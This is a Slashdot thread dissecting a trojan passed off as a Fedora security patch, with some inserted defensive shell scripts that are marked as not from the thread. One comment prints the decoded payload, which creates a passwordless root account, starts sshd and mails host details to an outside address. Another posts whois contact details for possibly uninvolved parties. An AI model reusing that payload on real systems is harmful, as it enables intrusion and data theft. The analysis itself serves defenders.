      'Grandma' should never be in the position to install software, IMO. I've been talking to my grandmother about a linux installation for a while, and I will hold 'the keys' and help her out via ssh. As she's pretty set in her ways with her software choices, it should be pretty simple as far as time is concerned.

      If you want to advocate linux, don't bother advocating education along with it. Really, if computers were as easy to use as cars it would be one thing, but it's not the case currently and I don't see a future that is accepting of it. Not everyone wants to learn how to pay attention to computer security, heck, some people don't even care enough to program their VCR clock (I know, dated analogy, feh).

    20. Re:We knew this day would come by Hatta · · Score: 1

      Actually this is already being done in the unix world, just no one takes advantage of it, or at least, pays attention.

      That's the problem isn't it? These systems are in place, but they don't stop this kind of thing from happening. A trusted computing environment like the OP was suggesting would stop this from happening, but would deprive me of the power to use my computer as I see fit.

      It's a hard problem. But I'm prepared to live with the consequences of freedom, even if it does result in more compromised systems. (or terrorist attacks, as the case may be)

      --
      Give me Classic Slashdot or give me death!
    21. Re:We knew this day would come by Anonymous Coward · · Score: 0

      windows sp2 does that, if you download anything, and try to run it, if it isn't digitally signed, it comes up with a box asking if you really want to do it etc, etc.

    22. Re:We knew this day would come by antoy · · Score: 1

      I'm not sure I understand what you are suggesting here. I assume you are referring to a process listing app, such as the Windows task manager?

      I'm suggesting executable control: If you run an executable that wasn't run before, it will ask you about the way it should handle it (complete trust, no network access, no filesystem access outside of home directory etc.) Also, lots of "Recommended" "Not Recommended" and stop signs for the "n00bs".

      Agreed, although even better is to have a NAT/firewall device for your internet connection.

      You're right, of course. But the personal firewall can help detect spyware by telling you what program is trying to be naughty.
      You're also right about the 'yes' reflex. But some people do read the warnings, and the uninitiated will ask their local 'tech-support' geek for an explanation. If the geek teaches them some good habits without needing to install 3rd-party software, it's a better world for all of us. More tech-savvy people will also like that they can try out that suspicious executable without compromising their machine/user account.

    23. Re:We knew this day would come by _Sprocket_ · · Score: 1

      That just means they'll join #linux on their favorite IRC net and DEMAND someone tell them how to install this security patch.

      Annoyed by the sense of entitlement, someone will tell them.

    24. Re:We knew this day would come by suckmysav · · Score: 2, Insightful

      Ah ha, got it

      The trouble again would be that most clueless users won't understand what the window asking:

      Do you want to allow application
      "W1NPR0C32.EXE" to execute?

      [YES] [NO]

      means, which leads to the same "yes click reflex" problem I described above.

      It is a problem, because no matter what you do, there is always going to be a group of numbnuts out there who will click yes on anything that pops up. Often, they won't even read what it says. Any solution that produces even greater numbers of YES/NO dialogues will only serve to make the problem worse I'm afraid.

      The solution as I see it is to deny (for a particular class of) users the ability for them to install anything in the first place.

      This can be achieved in theory by running Windows under a restricted user policy but in practice it doesn't work because too many programmers are too lazy to write their programs to run with anything other than "administrator" privileges, so we are stuck with a dilemma that will be hard to overcome.

      --
      "You can't fight in here, this is the war room!"
    25. Re:We knew this day would come by Erik+Hollensbe · · Score: 1

      Actually, I'm not sure if it would.

      'Trusted Computing' is nothing new, but automating trust is kind of an oxymoron, don't you think? I mean, even with a strong authentication, someone would just find some other hole in the system to exploit it.

    26. Re:We knew this day would come by antoy · · Score: 1

      means, which leads to the same "yes click reflex" problem I described above

      Yes, but in this case, the "yes click reflex" could be a good thing! If the default was a restricted environment for the executable, and if just clicking OK makes most of the programs work (because they are not violating the restrictions as a piece of malware would), then the system works. If it does violate the restrictions, a scary "Program tried to access the network" dialog box would tell you of the program's intents, and allow you to run it under less restrictions if you did want the program to access the network.

      The solution as I see it is to deny (for a particular class of) users the ability for them to install anything in the first place.

      You can prevent installation of a program by one user for all users (forbid change to global settings) but there is currently nothing that can stop an executable from doing whatever it wants in the user-specific registry tree and files. Even if the problem is reduced to a simple user, it's still a problem, as I said in my first post.
      The 'lazy programmers' part is true, but not that much anymore, fortunately. My family computer runs all accounts as normal users, and most software works properly, except for a badly designed Greek encyclopaedia from 1996.

    27. Re:We knew this day would come by runderwo · · Score: 1
      the key is inaccessible to me, stashed somewhere in the BIOS
      Actually, it's held inside the TCPA chip. Were it in the BIOS, it could be easily extracted.
    28. Re:We knew this day would come by maxwell+demon · · Score: 1
      The trouble again would be that most clueless users won't understand what the window asking:

      Do you want to allow application
      "W1NPR0C32.EXE" to execute?

      [YES] [NO]

      means, which leads to the same "yes click reflex" problem I described above.

      This can be solved by a simple redesign of the dialog box:


      An unknown application (W1NPR0C32.EXE) wants to open. This might be a security problem. Deny the start of the program?
      [YES] [NO]


      In this case, the "YES" reflex would actually cause the program not to execute.
      --
      The Tao of math: The numbers you can count are not the real numbers.
    29. Re:We knew this day would come by tacocat · · Score: 1
      Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check. Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"

      Your argument is flawed. You assume that at any time the Administrator will be approached with legitimate code and asked to install/upgrade their system. Even if this is not the Administrator doing it you're still making the same error.

      The simpler method of keeping the code base secure is to use the installation tools (apt-get for debian or rpm up2date tools) and only those tools for updating anything on the system. That way, if you get a solicitation for updates (legal or not) then you would use the system update tools to acquire and manage that package update.

      spouting off about signature systems that ask about if you trust something or not is going to be pretty useless considering all you have to do is keep up the game trying to convince idiot users that they can trust your package...

    30. Re:We knew this day would come by kasperd · · Score: 1

      Allowing only registered executables to run could be set up to prevent such things.
      Mounting /home, /tmp, and /var/tmp with noexec would take you a large step in that direction. I don't know how many other places an unprivileged user could possibly place an executable, maybe you want all of /var to be noexec.

      Microsoft signs their patches and programs too, but no regular user will ever check.
      Really? I wanted to do that once, when I had to upgrade the software on my brother's computer. But nobody could tell me how to verify signatures on Microsoft's patches. I even wrote an email to Microsoft, but they couldn't help me either. Of course a lot of people don't give a damn. I know people who keep installing rpm packages without checking the signatures, even though I keep explaining how to check the signatures, which is not much work.

      --

      Do you care about the security of your wireless mouse?
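
Added example, not from the thread: a small shell check for the noexec layer kasperd describes. It reads a mount table in /proc/mounts format from the file named as its argument (pass /proc/mounts on a live host) and reports, for each of /home, /tmp and /var/tmp, whether the directory is a separate filesystem mounted noexec. The mount table below is constructed for the demonstration.

```shell
# Added example: report which of /home, /tmp and /var/tmp are mounted noexec.
# $1 is a file in /proc/mounts format (device mountpoint fstype options ...).
check_noexec() {
    mounts="$1"
    for dir in /home /tmp /var/tmp; do
        # options column (field 4) of the line whose mount point is exactly $dir
        opts=$(awk -v d="$dir" '$2 == d { print $4 }' "$mounts")
        if [ -z "$opts" ]; then
            # not a separate filesystem: it inherits the parent's options, so
            # noexec cannot be set for this directory on its own
            printf '%s: not a separate mount\n' "$dir"
        elif printf '%s\n' "$opts" | tr ',' '\n' | grep -qx noexec; then
            printf '%s: noexec\n' "$dir"
        else
            printf '%s: MISSING noexec (%s)\n' "$dir" "$opts"
        fi
    done
}

# Constructed sample mount table: /tmp is hardened, /home is a separate
# filesystem without noexec, /var/tmp lives on the root filesystem.
sample=$(mktemp)
cat > "$sample" <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/sda2 /home ext3 rw,nosuid 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
EOF
check_noexec "$sample"
rm -f "$sample"
```

noexec only refuses direct execution of a file on that filesystem; a script can still be handed to an interpreter, so treat this as one layer alongside signed packages, not as a substitute for them.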
    31. Re:We knew this day would come by suckmysav · · Score: 1

      Good point.

      I suppose all the malware producers would need to do is further entwine their trojan apps with the distribution host (eg the "Aquarium Screensaver").

      When the user discovers that their shiny new screensaver refuses to work unless the malware is executed (ie [NO] is clicked) then we would be back to square one.

      BUT, I guess anything that makes it more difficult for malware "vendors" can't be a bad thing overall.

      I still think a fixed (as in static) user environment is the best way to fully protect the ignorant masses from their own stupidity.

      I have been thinking about this lately, and am currently toying with the idea of a limited function "root/administrator" account. Make it so that the root/admin privileges account of whatever OS you are using has FULL access to install stuff but LIMITED (or somehow partially crippled) ability to do other stuff that normal users might like to do. Maybe have far stricter security policies in place for root accounts causing pop up windows galore whenever potentially dangerous stuff is happening. The idea is to make any account with "administrator" privileges annoying enough that people will definitely NOT want to conduct their day to day usage with root privileges.

      You could then restrict the ability of general users to install stuff, with a corresponding decrease in the frequency of annoying YES/NO dialogue requirements. If people want to install stuff, they can log in temporarily as root and wade through the higher levels of annoying YES/NO dialogues. They will get what they want done and then log straight out and go back to their less annoying user account.

      Anyway, I'm really just thinking out loud here.

      --
      "You can't fight in here, this is the war room!"
    32. Re:We knew this day would come by antoy · · Score: 1

      The simpler method of keeping the code base secure is to use the installation tools (apt-get for debian or rpm up2date tools) and only those tools for updating anything on the system.

      Maybe I haven't made myself clear, but I was not talking about updates, I was talking about any random downloaded executable.

      If you're used to the Unix/Linux way of thought, it's weird. But Windows doesn't have a central trusted repository of packages.
      Think of it in this way (I'm a Debian user): You're looking for a .deb for an obscure piece of software, and you finally find it on some guy's personal repository. You add his site on sources.list and apt-get update/apt-get install someprogram. Is this safe? Of course not. But if you need that program, you acknowledge the (practically tiny) risk and go ahead.

      spouting off about signature systems that ask about if you trust something or not is going to be pretty useless considering all you have to do is keep up the game trying to convince idiot users that they can trust your package...

      Having to convince the 'idiot' is still better than trusting the package without a single prompt. The measure is weak and flawed, yes. That was not my main argument, however. The .NET-like fine-grained security policy is a much more serious solution (if it is eventually presented properly)

    33. Re:We knew this day would come by mshiltonj · · Score: 1

      The solution as I see it is to deny (for a particular class of) users the ability for them to install anything in the first place.

      You must be a sysadmin where I work. I hate you.

    34. Re:We knew this day would come by FireFury03 · · Score: 2, Interesting

      Really, if computers were easy to use as cars it would be one thing, but it's not the case currently and I don't see a future that is accepting of it.

      Really? IMHO computers probably are as easy as cars. i.e. if my car needs some maintenance, I don't do it myself (at least, not for anything but the most simple stuff - I wouldn't know where to start), I go to the garage and pay someone who knows what he's doing to fix it. The same applies to computers - if you need some maintenance doing to your computer and you don't know enough to do it yourself then you should be paying a professional to look at it.

      Too many people have an attitude of "it should be simple enough for me to maintain" when it comes to computers - I have to ask why? How many people strip down their car engine and then are left with a pile of bits on the floor with no clue how to put them back together and blame the car manufacturer for not making it "easy enough"?

      Just because a computer plugs into the wall like a toaster doesn't mean that the user has a "right" to be able to maintain it without any training. I think people need to get out of the idea that computers are things which you buy and then they don't need any upkeep - computers are definitely things that you buy and then need maintenance every so often. Some of us are knowledgeable enough to do it ourselves, but the rest should get a professional to sort it out. Maybe manufacturers specifying that a computer requires a yearly service by a professional engineer would be a good idea?

    35. Re:We knew this day would come by strider44 · · Score: 1

      The difference is that Windows will set up all users as administrators, true, but running as a plain user can be very bad too.

      Perhaps another problem with this, I remember saying before, is that most clueless users will just respond to the following instructions:

      1. Login as root.

      2. ...

    36. Re:We knew this day would come by antiMStroll · · Score: 1
      I think the number that's going around for average length of time an unpatched Windows box can be connected to the internet before being owned is 16 minutes. Often faster than it can be patched. Conversely, I've run 2K and XP as 'user', including in small corporate environments where machines are populated or performing automated tasks 24 hours a day, for years without incident.

      What you say is true but the emphasis leaves a questionable impression. In my experience if operating under 'user' permissions were the norm it would eliminate almost all the trojan, worm, etc. traffic happening today, not by making an exploit impossible but by raising the effort required to a sufficiently high level.

    37. Re:We knew this day would come by ajs318 · · Score: 1

      The only thing you can do about stupid people is hope that sooner or later, they will make a mistake that either (a) teaches them not to be so stupid or (b) eliminates them from the respiration-photosynthesis cycle.

      In the old days, when you had power tools with big blades and no safety guards, nobody ever made the same mistake twice. Computers have made things easier and safer for idiots, and idiots have made things harder and more dangerous for the rest of us.

      --
      Je fume. Tu fumes. Nous fûmes!
    38. Re:We knew this day would come by DissidentHere · · Score: 1

      Oh give over. No one would ever suggest that every /.er out there is a super genius. Truth be told though, the /. crowd tends to be pretty intelligent (aside from spelling and grammar). This is especially true when it comes to computers and technology.

      There are very few things in life that have a probability of 0 (or 1 for that matter, other than death and taxes and most of us not getting laid :-) But, the chances of a /. user falling for a social engineering scam of this kind is rather small.

      The point I'm trying to make is that social engineering scams are common, and as more secure OSes become popular (i.e. not Windows) the vulnerabilities will focus more on tricking users than technological exploits. So maybe you're pretty set with your grandma, but my former in laws installed stuff all the time, they were fascinated with the Web and these neat little things they use to check the weather, play cards, etc, etc. I was constantly educating them on how to avoid getting malware and cleaning up their systems. You know that as soon as these types of user start on *nix we'll hear about how insecure it is. The error is between the chair and the keyboard.

      To say that education should not go along with technology can only make the situation worse. Computers are no more difficult to use than cars, people are just more comfortable with cars, and have more education with them. Sure, most people can't work on a car, but most people know (in theory) how to avoid an accident. That's what a lot of these 'vulnerabilities' are, accidents. Education on basic operation and safety is essential to 'safe computing.'

      And yes, no one can set their VCR clock (mine's not), but this is an interface issue. It's a difficult interface, even more so than a computer due to the limited input interface.

      OK, if nothing made sense it's because I'm home doped up on Nyquil, so sorry.

      --
      "None of us are as dumb as all of us." - meeting mantra
    39. Re:We knew this day would come by Rakarra · · Score: 1
      Agreed, although even better is to have a NAT/firewall device for your internet connection. I'm not a fan of having a local "personal" firewall on a n00bs PC, as n00bs have a habit of screwing things up, and this includes screwing up their firewall software. If your firewall functionality is sitting in a little NAT box in the corner then they are not gonna accidentally screw it up. Also, personal firewalls such as ZoneAlarm can also suffer from the "yes click reflex" problem.

      "Why can't I play FanFooFighters 2004 online with my friends?"

      "Sorry, your firewall is blocking all those incoming packets, and the game isn't compatible with NAT."

      I can see that firewall going by the wayside quickly. The game industry as a whole needs to get its act together regarding the ability of games to play behind firewalls and NAT. Some games embed IP addresses inside their network protocol, making it nearly impossible to play them from within a NATed environment.

    40. Re:We knew this day would come by Erik+Hollensbe · · Score: 1

      You must be a user where I work, grow a pair, because that high pitched whine is starting to get annoying.

    41. Re:We knew this day would come by tcgroat · · Score: 1
      "Here are the certifications, do you trust this?" Why, it came from "fedora-redhat.com", so of course you trust it!

      Think about it: if you believe the phony web site is legitimate, you're likely to accept the matching bogus credentials, too. The credentials match the site, so what would arouse suspicion in anybody who already (incorrectly) trusts the web site? That is an inherent risk with a credential system: any attacker who can obtain a credential gains an appearance of legitimacy.

    42. Re:We knew this day would come by Erik+Hollensbe · · Score: 1

      I have no idea how you found that the sentence that you based your whole argument off of was in disagreement with it.

      If auto makers were constantly pushing the ease of maintenance features on you, instead of the mechanic, I think you'd find that the norm would be quite different.

      I mean, take a look at systems with goals like Mandrake. Terms like "Easy Linux", "Accessible Linux".... "Desktop Linux" are dropped so often that people have adopted it as if it's some panacea towards "saving" an OS which already has enough critical mass in the NOC to keep its forward momentum. It's just stupid and reeks of a need to have something to strive for, regardless if it's pragmatic or not.

    43. Re:We knew this day would come by Erik+Hollensbe · · Score: 1

      Oh give over. No one would ever suggest that every /.er out there is a super genius. Truth be told though, the /. crowd tends to be pretty intelligent (aside from spelling and grammar). This is especially true when it comes to computers and technology.

      I don't come here for intelligent discussion, to be honest. I get bored, come here, and post. I doubt the very generic group that is slashdot would be interested in my musings on state machines, and I'll be damned if I talk about the merits of FreeBSD administration because I'll just get flamed for "trolling" or some random untrue bullshit.

      I really only take issue with this point because for some reason, people think /. is more than just the National Enquirer of the technology world. If you'd be honest with yourself, you'd find it much less engaging and much more enjoyable.

      Unfortunately even the ACM these days is looking to make an extra buck and a lot of the articles in rags like Queue really ruin it.

  3. About Time by Mr.+Arbusto · · Score: 4, Insightful

    It's fishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.

    1. Re:About Time by seanvaandering · · Score: 1

      It's fishing...

      Do you have r00t? No? Go Phish!

    2. Re:About Time by Kenja · · Score: 2, Informative
      "it happens on every platform

      hasn't happened on my SGI yet.

      --

      "Have you ever thought about just turning off the TV, sitting down with your kids, and hitting them?"
    3. Re:About Time by BenjiTheGreat98 · · Score: 1

      Nor to my AS/400, either.

      --
      :wq
  4. I'll try it... by enginuitor · · Score: 5, Interesting

    I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.

    Stay tuned.

    1. Re:I'll try it... by busonerd · · Score: 2, Interesting

      Same here. Lets use this thread for a discussion of wtf it does.

    2. Re:I'll try it... by damiam · · Score: 5, Informative

      Make sure you use a chroot jail; Knoppix can still write to your hard drive.

      --
      It's hard to be religious when certain people are never incinerated by bolts of lightning.
    3. Re:I'll try it... by enginuitor · · Score: 1

      I'm removing all local disks from the system. Just CD. Stay tuned for updates...

    4. Re:I'll try it... by busonerd · · Score: 4, Informative

      [apologies for replying to myself]

      The makefile compiles an application called inst that seems to have been created with the shc script compiler... it's rather obfuscated... attempting to reverse engineer now

    5. Re:I'll try it... by eakerin · · Score: 4, Informative
      Well I downloaded it, and uncompressed it.

      There are 3 files:
      fileutils-patch.bin
      inst.c
      Makefile

      fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from redhat (verified the GPG signature). Probably just put there to make it look bigger, and have something that came from redhat.

      Well I was gonna put the package header information here, but slashcode didn't like it.

      Signature verification using "rpm --checksig fileutils-patch.bin"
      fileutils-patch.bin: (sha1) dsa sha1 md5 gpg OK
    6. Re:I'll try it... by superpeach · · Score: 5, Informative

      I just looked at inst.c and changed it a bit to print what it runs instead of running it. Looks like a shell script hidden in some C (using shc, http://www.datsi.fi.upm.es/~frosal/sources/shc.html )

      The working bit of the script is:

      echo "Inca un root frate belea: " >> /tmp/mama
      adduser -g 0 -u 0 -o bash >> /tmp/mama
      passwd -d bash >> /tmp/mama
      ifconfig >> /tmp/mama
      uname -a >> /tmp/mama
      uptime >> /tmp/mama
      sshd >> /tmp/mama
      echo "user bash stii tu" >> /tmp/mama
      cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
      rm -rf /tmp/mama

      So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.
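
Added example, not from the thread: a defender's check for the two traces the script above leaves on a host, a second UID 0 account (from "adduser -g 0 -u 0 -o bash") and an account whose password field was emptied (from "passwd -d bash"). It takes copies of passwd and shadow as arguments so it can be run on files pulled off a suspect machine; on a live system pass /etc/passwd and /etc/shadow (reading the latter needs root). The two sample files are constructed, including the placeholder hashes.

```shell
# Added example: audit passwd/shadow copies for extra UID 0 accounts and
# accounts with an empty password hash.

find_uid0_accounts() {
    # every account with UID 0 other than root itself ($1 = passwd file)
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

find_empty_passwords() {
    # a shadow entry with an empty hash field lets that account log in with
    # no password at all ($1 = shadow file)
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Prints one line per finding. Exit status 0 = clean, 1 = something found.
audit_accounts() {
    hits=0
    for u in $(find_uid0_accounts "$1"); do
        printf 'UID 0 account besides root: %s\n' "$u"
        hits=$((hits + 1))
    done
    for u in $(find_empty_passwords "$2"); do
        printf 'empty password: %s\n' "$u"
        hits=$((hits + 1))
    done
    [ "$hits" -eq 0 ]
}

# Constructed sample files in /etc/passwd and /etc/shadow format.
pw=$(mktemp); shd=$(mktemp)
cat > "$pw" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alice:x:500:500::/home/alice:/bin/bash
bash:x:0:0::/home/bash:/bin/bash
EOF
cat > "$shd" <<'EOF'
root:$1$constructed$placeholderhash:12700:0:99999:7:::
alice:$1$constructed$placeholderhash:12700:0:99999:7:::
bash::12700:0:99999:7:::
EOF
if audit_accounts "$pw" "$shd"; then
    echo "no findings"
else
    echo "findings present: investigate this host"
fi
rm -f "$pw" "$shd"
```

The script also starts sshd, so on a suspect host pair this with a look at which sshd processes are listening and when they were started; a brand-new UID 0 login with no password plus an unexpected sshd is the whole point of the payload.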

    7. Re:I'll try it... by Cid+Highwind · · Score: 3, Informative

      From a quick glance at the source, it looks like "inst" is an RC4 decryption program with a hard-coded (but obfuscated) key. It will probably decrypt fileutils-patch.bin into the real exploit code.

      --
      0 1 - just my two bits
    8. Re:I'll try it... by Anonymous Coward · · Score: 0

      The echo messages look Romanian. Doesn't really surprise me

    9. Re:I'll try it... by aredubya74 · · Score: 4, Informative

      Assuming (yeah, I know, big assumption) the whois info is relatively accurate, we may have an idea as to at least the next step in the chain of figuring out the culprit, output of whois addlebrain.com:

      Registration Service Provided By: StoreIQ, Inc.
      Contact: technical@storeiq.com
      Visit:

      Domain name: addlebrain.com

      Registrant Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Administrative Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Technical Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Billing Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Status: Locked

      Name Servers:
      dns1.name-services.com
      dns2.name-services.com
      dns3.name-services.com
      dns4.name-services.com
      dns5.name-services.com

      The same address is used for two associated domains, buywirelessdirect.com (the email addy for this domain's tech contact) and storeiq.com (the email addy for buywirelessdirect.com's tech contact). The area code is accurate for that neck of the woods too, though I haven't tried the phone number (yet):

      StoreIQ, Inc.
      John Thompson (technical@storeiq.com)
      +1.7323331145
      Fax:
      3587 US Highway 9 #213
      Freehold, NJ 07728
      US

      --

      RW

    10. Re:I'll try it... by at_slashdot · · Score: 2, Informative

      It's Romanian.

      --
      "It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
    11. Re:I'll try it... by Anonymous Coward · · Score: 0

      It is Romanian, but this does not mean that all Romanians programmers are hackers. Only the stupid ones :)

    12. Re:I'll try it... by Anonymous Coward · · Score: 1, Interesting

      ok.. that's just weird. About 2 weeks ago I set work's firewall up to fwd SSH attempts to a sacrificial box on my network (it gave a login prompt but would deny any login attempts). I got a fuckton of login tries from some czech website with a 'mama' subdomain. about 10 root password guesses, and then 10 guesses of common login names. I didn't think much of it until I saw the names of the temp files created by this phisher.

    13. Re:I'll try it... by Colin+Smith · · Score: 1

      The mail server for addlebrain.com is

      Non-authoritative answer:
      addlebrain.com mail exchanger = 0 sitemail.everyone.net.

      Though I'd bet that their system has been compromised.

      --
      Deleted
    14. Re:I'll try it... by superpeach · · Score: 1

      what does it say? :)

    15. Re:I'll try it... by Anonymous Coward · · Score: 1, Interesting

      nmap addlebrain.com ...

      Every port is open? Is it running tcpdump?

      Probably is compromised.

    16. Re:I'll try it... by Anonymous Coward · · Score: 0

      Didn't mean to insult Romanian programmers (spent a few years working on a project in Bucharest), but there are a large number of Phishing schemes originating there and Bulgaria.

    17. Re:I'll try it... by Anonymous Coward · · Score: 0

      don't worry, we consider this a compliment.

    18. Re:I'll try it... by at_slashdot · · Score: 3, Informative

      echo "Inca un root frate belea: "
      -translation: one more "root" brother trouble

      echo "user bash stii tu" >> /tmp/mama
      -translation: "user bash" you know

      cat /tmp/mama | mail -s "Inca o roata"
      -translation: one more wheel (roata -- root... it sounds alike)

      It doesn't say anything meaningful, the guy is an idiot.

      --
      "It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
    19. Re:I'll try it... by hattmoward · · Score: 2, Informative

      Generally an every-port-open result from nmap indicates use of a firewall. Watchguard's products tend to do that, and iptables can be made to do similar also.

    20. Re:I'll try it... by allden · · Score: 1

      What are the chances that his machine is hacked into by someother person?

    21. Re:I'll try it... by athakur999 · · Score: 1

      If you want to be really safe, fire up that copy of VMWare you acquired off some BitTorrent site last week. :)

      --
      "People that quote themselves in their signatures bother me" - athakur999
    22. Re:I'll try it... by dacarr · · Score: 1

      So perhaps we just start sending random emails to 'root@addlebrain.com' from nonexistent addresses?

      --
      This sig no verb.
    23. Re:I'll try it... by mackstann · · Score: 1

      Funny they didn't redirect stderr; no wonder people were getting error messages spewed at them.

      And rm -rf a file? Seems like whoever did this was an amateur. (surprise)

    24. Re:I'll try it... by Anonymous Coward · · Score: 0

      using rpm2cpio and then decompressing the resultant cpio file, it actually is just a bunch of normal linux utils (diff'd them against the Redhat =) Server @ work). It's just the installer that is nasty. It was as simple as:
      for i in *
      do
        tmp=/bin/$i              # the installed copy of the same utility
        diff --brief $tmp ./$i   # report only whether the two files differ
      done

      in the bin directory from the archive... so you're right, it's pulled directly from Red Hat and put there just to make it look more legit.
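
Added example, not from the thread: the same comparison as the loop above, generalised to a whole extracted tree rather than one directory. For every regular file under the unpacked archive it looks for the same relative path under a system root and reports whether the two are identical, differ, or whether nothing is installed at that path (the case that matters for a dropped installer like inst). Both roots are arguments, so it runs on the constructed sample trees below as well as on a real rpm2cpio output directory compared against /.

```shell
# Added example: compare every file in an extracted tree with its counterpart
# under a system root. $1 = extracted tree, $2 = system root (e.g. /).
compare_tree() {
    extracted="$1"; sysroot="$2"
    ( cd "$extracted" && find . -type f ) | sort | while read -r rel; do
        rel=${rel#./}
        if [ ! -e "$sysroot/$rel" ]; then
            # nothing installed at that path: new file the package would add
            printf 'MISSING   %s\n' "$rel"
        elif cmp -s "$extracted/$rel" "$sysroot/$rel"; then
            printf 'same      %s\n' "$rel"
        else
            # installing this would replace a system file with different bytes
            printf 'DIFFERS   %s\n' "$rel"
        fi
    done
}

# Constructed sample: a fake system root and a fake extracted archive.
demo=$(mktemp -d)
mkdir -p "$demo/sys/bin" "$demo/pkg/bin"
printf 'ls binary\n' > "$demo/sys/bin/ls"
printf 'ls binary\n' > "$demo/pkg/bin/ls"            # identical copy
printf 'mkdir binary\n' > "$demo/sys/bin/mkdir"
printf 'mkdir binary v2\n' > "$demo/pkg/bin/mkdir"   # modified copy
printf 'extra\n' > "$demo/pkg/bin/inst"               # not present on the system
compare_tree "$demo/pkg" "$demo/sys"
rm -rf "$demo"
```

A byte-identical match against the installed binaries is exactly what the poster found for the RPM contents; the interesting lines are the MISSING and DIFFERS ones, which is where the installer and any replaced utilities would show up.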

    25. Re:I'll try it... by SynKKnyS · · Score: 2, Informative

      Argh, notice it is an IIS server. And, notice that they offer free email. Put the two together. Someone registered the username "root" apparently. Tricksy.

    26. Re:I'll try it... by commodoresloat · · Score: 1

      I was going to suggest that addlebrain was just a rooted box, but you might be right. Definitely a cute twist if so.

  5. wont work by Anonymous Coward · · Score: 3, Insightful

    Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.

    1. Re:wont work by bcs_metacon.ca · · Score: 1

      Here's hoping *none* would. Fedora Core gives you the option of using up2date or yum right out of the box, and some people use apt. All three do GPG signature checking by default.

      I hope anyone stupid enough to fall for this obvious scam would also be too dumb to know how to compile and install the software anyway.

      This was a pretty lame attempt. If someone *really* wanted to cause havoc, they'd hack one of the central repositories and insert poison packages into a trusted source. Of course, that's orders of magnitude more difficult. I mean, that hasn't even happened to Windows Update yet! :-)

      --

      How appropriate. You fight like a cow.
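
Added example, not from the thread: the "GPG signature checking by default" point only holds while every enabled repository keeps it on, so this is a check for yum repository definitions (.repo files or yum.conf) that flags enabled repos with gpgcheck=0 and repos that never set it (those inherit whatever [main] says, which is worth knowing before trusting them). The repository file is constructed; the example.invalid URLs are placeholders.

```shell
# Added example: list enabled yum repositories whose signature checking is
# off (gpgcheck=0) or not set at all. $1 = a .repo or yum.conf file.
find_unsigned_repos() {
    awk '
        function flush() {
            # report the section just finished; [main] is yum config, not a repo
            if (sect == "" || sect == "main" || enabled != 1) return
            if (gpg == "0") print sect ": gpgcheck=0"
            else if (gpg == "") print sect ": gpgcheck not set"
        }
        /^\[/ {
            flush()
            sect = $0; sub(/^\[/, "", sect); sub(/\].*$/, "", sect)
            enabled = 1   # yum treats a repo as enabled unless enabled=0 is given
            gpg = ""
        }
        /^[ \t]*enabled[ \t]*=/  { split($0, kv, "="); gsub(/[ \t]/, "", kv[2]); enabled = kv[2] + 0 }
        /^[ \t]*gpgcheck[ \t]*=/ { split($0, kv, "="); gsub(/[ \t]/, "", kv[2]); gpg = kv[2] }
        END { flush() }
    ' "$1"
}

# Constructed sample: one official-looking repo with checking on, one personal
# repo with it off, one disabled repo, and one that never sets gpgcheck.
repo=$(mktemp)
cat > "$repo" <<'EOF'
[main]
gpgcheck=1

[fedora]
name=Fedora Core
baseurl=http://example.invalid/fedora
enabled=1
gpgcheck=1

[some-guys-repo]
name=Personal repo
baseurl=http://example.invalid/personal
enabled=1
gpgcheck=0

[testing]
name=Testing
baseurl=http://example.invalid/testing
enabled=0
gpgcheck=0

[no-setting]
name=Unset
baseurl=http://example.invalid/unset
enabled=1
EOF
find_unsigned_repos "$repo"
rm -f "$repo"
```

The fix for a flagged repo is gpgcheck=1 plus a gpgkey= line pointing at the key you have actually verified; a repo you cannot get a key for is one you are trusting on the strength of its URL alone, which is exactly the trust the fedora-redhat.com mail was trying to borrow.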
    2. Re:wont work by Antique+Geekmeister · · Score: 1

      Unfortunately, a lot of Linux users like the gentoo approach, where you pull random stuff off of the net "because someone said it was good" and compile and install it locally, rather than installing signed packages or vetting the source of any tarballs you add to your system. This includes some Fedora and RedHat users, especially since Yum was never officially published by RedHat for anything other than Fedora, and since RedHat hasn't been publishing security updates for RedHat 9 or earlier for some time now.

      Expect a lot of newbie home administrators to get caught by this, especially at academic sites where an "open environment" and "fostering creativity" take precedence over stability and security and reviewing your code before you run it.

    3. Re:wont work by Ulysses · · Score: 1

      OK, first off you've obviously never actually used Gentoo, or you would know that your statement is entirely untrue.

      The Gentoo package administration utility (portage) automatically performs a checksum comparison of all downloaded source files before compilation and/or installation. Valid checksum values for all portage managed packages are stored and distributed on the Gentoo mirrors, in the same manner that Red Hat provides checksum values for all their rpm packages.

      Frankly, I think it's much more likely that some newbie Red Hat or Fedora Core admin will download and install a trojan rpm package off the net, than that an equivalent Gentoo admin will download a trojan source file off the net, compile it correctly, and install it.

      I say this having administered both Red Hat and Gentoo environments for several years.

      --
      -- If it weren't for the voices in my head, I'd go insane from loneliness. -Me, Myself and I
